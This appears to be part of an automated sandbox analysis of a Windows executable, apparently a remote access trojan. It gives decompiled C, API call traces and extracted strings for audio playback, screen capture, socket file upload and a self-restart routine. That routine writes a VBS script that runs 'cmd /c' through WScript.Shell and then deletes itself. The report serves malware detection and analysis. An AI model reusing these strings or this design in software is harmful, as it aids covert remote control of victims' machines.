                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 2802067201-3088914985
                                  • Opcode ID: f4826861e5298439744646951860ce9fb7ab057ff257c0e16f58e1680acdb359
                                  • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                  • Opcode Fuzzy Hash: f4826861e5298439744646951860ce9fb7ab057ff257c0e16f58e1680acdb359
                                  • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
                                  				char _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char _v68;
                                  				char _v84;
                                  				char _v88;
                                  				char* _t35;
                                  				char* _t36;
                                  				char* _t37;
                                  				WCHAR* _t38;
                                  				void* _t43;
                                  				void* _t47;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t78;
                                  				intOrPtr _t79;
                                  				intOrPtr _t86;
                                  				intOrPtr _t87;
                                  				intOrPtr* _t88;
                                  				void* _t91;
                                  
                                  				_t30 = __eax;
                                  				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
                                  				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t30 = E004135DE();
                                  					_t91 = _t91 + 0xc;
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				if(_t30 <= 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					if(PathFileExistsW(_t30) != 0) {
                                  						goto L4;
                                  					} else {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
                                  					}
                                  				} else {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
                                  					E00412E4E(_t30);
                                  					_t91 = _t91 - 0x10 + 0x14;
                                  					L4:
                                  					_t35 =  &_v68;
                                  					L0041416A();
                                  					_t36 =  &_v52;
                                  					L00414146();
                                  					_t37 =  &_v36;
                                  					L0041414C();
                                  					_t38 =  &_v20;
                                  					L00414146();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					mciSendStringW(_t38, 0, 0, 0);
                                  					mciSendStringA("play audio", 0, 0, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					E004020C2(0x41c178, 0xa9, 0x415664);
                                  					_t43 = CreateEventA(0, 1, 0, 0);
                                  					 *0x41c1d4 = _t43;
                                  					if(_t43 != 0) {
                                  						do {
                                  							if( *0x41c1d2 != 0) {
                                  								mciSendStringA("pause audio", 0, 0, 0);
                                  								 *0x41c1d2 = 0;
                                  							}
                                  							if( *0x41c1d3 != 0) {
                                  								mciSendStringA("resume audio", 0, 0, 0);
                                  								 *0x41c1d3 = 0;
                                  							}
                                  							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
                                  							_t50 = "stopped";
                                  							_t88 =  &_v88;
                                  							while(1) {
                                  								_t86 =  *_t88;
                                  								_t78 = _t86;
                                  								if(_t86 !=  *_t50) {
                                  									break;
                                  								}
                                  								if(_t78 == 0) {
                                  									L14:
                                  									_t50 = 0;
                                  								} else {
                                  									_t87 =  *((intOrPtr*)(_t88 + 1));
                                  									_t79 = _t87;
                                  									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
                                  										break;
                                  									} else {
                                  										_t88 = _t88 + 2;
                                  										_t50 = _t50 + 2;
                                  										if(_t79 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L14;
                                  										}
                                  									}
                                  								}
                                  								goto L18;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							L18:
                                  							if(_t50 == 0) {
                                  								SetEvent( *0x41c1d4);
                                  							}
                                  							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
                                  								CloseHandle( *0x41c1d4);
                                  								 *0x41c1d4 = 0;
                                  							}
                                  						} while ( *0x41c1d4 != 0);
                                  					}
                                  					mciSendStringA("stop audio", 0, 0, 0);
                                  					mciSendStringA("close audio", 0, 0, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t47;
                                  			}

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                  • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                  • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                  • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                  • API String ID: 1753768752-1354618412
                                  • Opcode ID: 765aabc8db0142e62955e7b1a7793da8d9cfa88518039bab73f2148d12eff53b
                                  • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                  • Opcode Fuzzy Hash: 765aabc8db0142e62955e7b1a7793da8d9cfa88518039bab73f2148d12eff53b
                                  • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(Function_0001B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                  • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                  • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                  • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                  • API String ID: 2510920776-3166941866
                                  • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                  • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                  Uniqueness
                                  Uniqueness Score: -1.00%
                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                  • _wgetenv.MSVCRT ref: 00408A1B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                  • exit.MSVCRT ref: 00408B3D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                  • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                  • API String ID: 864010295-1332127163
                                  • Opcode ID: 1c6ab792c620b6584a4ab4f98d9966bb31bfee14e9a6bd9bcf280c06ec755d35
                                  • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                  • Opcode Fuzzy Hash: 1c6ab792c620b6584a4ab4f98d9966bb31bfee14e9a6bd9bcf280c06ec755d35
                                  • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                  Uniqueness
                                  Uniqueness Score: -1.00%
                                  APIs
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                  • _itoa.MSVCRT ref: 0040F75C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
